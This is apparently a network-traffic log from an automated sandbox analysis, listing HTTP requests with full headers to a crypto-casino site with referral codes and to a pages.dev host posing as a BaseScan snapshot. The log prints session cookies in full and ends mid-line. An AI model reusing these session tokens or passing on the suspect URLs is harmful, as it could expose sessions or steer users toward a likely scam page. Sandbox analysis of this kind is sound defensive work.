            Source: global trafficHTTP traffic detected: GET /assets/index-OFWIR-XG.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-C-NOM3iv.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-CMxvzQWG.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/OriginalsGames-46WI0mge.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-OFWIR-XG.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-DH9MDtxd.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/_basePropertyOf-BhSQSS-6.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-C-NOM3iv.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /cache/game/support/system/conf/ HTTP/1.1Host: bcgame.skConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-CMxvzQWG.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-kxowZSkm.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/assets/index-DD2Zk4iT.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/cryptoonlinecasino-B8XA0kSA.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/assets/index-DD2Zk4iT.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/workbox-window.prod.es5-Cr_0OO2S.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/assets/index-DD2Zk4iT.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/OriginalsGames-46WI0mge.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/_basePropertyOf-BhSQSS-6.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-CDNrQPXg.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/assets/index-DD2Zk4iT.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-DH9MDtxd.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; 